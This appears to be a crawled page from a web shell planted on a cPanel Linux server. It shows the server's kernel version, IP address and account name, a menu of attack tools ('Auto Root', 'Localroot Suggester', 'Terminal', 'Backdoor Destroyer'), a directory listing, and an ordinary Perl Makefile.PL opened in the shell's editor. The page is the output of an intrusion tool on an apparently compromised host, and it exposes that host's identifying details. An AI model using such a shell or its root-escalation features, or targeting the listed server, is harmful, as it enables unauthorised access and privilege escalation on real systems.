Linux cpanel2.daytoncreative.net 2.6.32-754.29.2.el6.x86_64 #1 SMP Tue May 12 17:39:04 UTC 2020 x86_64
Apache/2.4.43 (cPanel) OpenSSL/1.1.1g mod_bwlimited/1.4
Server IP : 70.62.220.67 & Your IP : 216.73.216.193
Domains :
Cant Read [ /etc/named.conf ]
User : michaelgreg
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
log /
perl-5.20.2 /
dist /
lib /
Delete
Unzip
Name
Size
Permission
Date
Action
blib
[ DIR ]
drwxr-xr-x
2016-10-10 17:37
t
[ DIR ]
drwxr-xr-x
2015-02-14 16:56
Makefile
22.99
KB
-rw-r--r--
2016-10-10 17:37
Makefile.PL
1.03
KB
-r--r--r--
2014-12-27 11:48
lib.pm
5.87
KB
-rw-r--r--
2016-10-10 17:37
lib_pm.PL
7.86
KB
-r--r--r--
2014-12-27 11:48
pm_to_blib
0
B
-rw-r--r--
2016-10-10 17:37
Save
Rename
## This -*- perl -*- script writes the Makefile for lib.pm # You should read "perldoc perlmodinstall" for instructions on # how to install modules like this. require 5.006_001; use strict; use ExtUtils::MakeMaker; my $lib_version = '0.62'; my $extra_meta = <<"EMETA"; provides: lib: file: lib_pm.PL version: $lib_version EMETA my $extra_meta_hash = { provides => { lib => { file => 'lib_pm.PL', version => $lib_version, }, }, }; my $mm_version = $ExtUtils::MakeMaker::VERSION; WriteMakefile( 'NAME' => 'lib', 'VERSION' => $lib_version, 'LICENSE' => 'perl', 'PREREQ_PM' => {}, 'ABSTRACT_FROM' => 'lib_pm.PL', 'AUTHOR' => 'Steffen Mueller <smueller@cpan.org>', 'INSTALLDIRS' => ($] < 5.012 ? 'perl' : 'site'), 'PL_FILES' => {'lib_pm.PL' => 'lib.pm'}, 'PM' => {'lib.pm' => '$(INST_LIBDIR)/lib.pm'}, 'clean' => {FILES => 'lib.pm'}, ( $mm_version >= 6.46 ? (META_ADD => $extra_meta_hash) : ( $mm_version >= 6.3002 ? (EXTRA_META => $extra_meta) : () ) ), );